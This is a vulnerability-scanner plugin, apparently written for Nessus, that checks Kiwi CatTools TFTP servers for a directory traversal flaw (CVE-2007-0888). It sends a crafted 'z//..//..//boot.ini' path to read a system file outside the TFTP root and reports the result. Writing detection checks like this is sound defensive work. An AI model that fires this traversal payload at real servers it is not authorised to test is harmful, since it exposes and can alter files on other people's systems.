#
# Script Written By Ferdy Riphagen 
# Script distributed under the GNU GPLv2 License.
#

desc = "
Synopsis :

The remote tftpd server is affected by a directory traversal vulnerability.

Description :

Kiwi CatTools is installed on the remote host. The version installed is vulnerable
to a directory traversal attack by using '[char]//..' sequences in the path. A attacker may be able to read and
write files outside the tftp root.

See also :

http://www.kiwisyslog.com/kb/idx/5/178/article/
http://marc.theaimsgroup.com/?l=bugtraq&m=117097429127488&w=2

Solution :

Upgrade to Kiwi CatTools version 3.2.9 or later.

Risk factor :

Medium / CVSS Base Score : 6.8 
(AV:R/AC:L/Au:NR/C:C/A:N/I:P/B:C)";

if (description) {
 script_id(200001);
 script_version("$Revision: 1.0 $");

 script_cve_id("CVE-2007-0888");
 script_bugtraq_id(22490);

 name["english"] = "Kiwi CatTools < 3.2.9 Directory Traversal";
 script_name(english:name["english"]);
 script_description(english:desc);
 summary["english"] = "Try to grab a file outside the tftp root";
 script_summary(english:summary["english"]);

 script_category(ACT_ATTACK);
 script_family(english:"Remote file access");
 script_copyright(english:"This script is Copyright (C) 2007 Ferdy Riphagen");

 script_dependencies("tftpd_detect.nasl");
 script_require_keys("Services/udp/tftp");
 exit(0);
}

include("tftp.inc");

port = get_kb_item("Services/udp/tftp");
if (!port) port = 69;

get = tftp_get(port:port, path:"z//..//..//..//..//..//boot.ini");
if (isnull(get)) exit(0);
if (egrep(pattern:"default=multi.*disk.*partition", string:get)) {
    report = string(
	desc, "\n\n", "Plugin output :\n\n",
	"The boot.ini file contains:\n", get); 
    security_warning(port, data:report);
    exit(0);
}
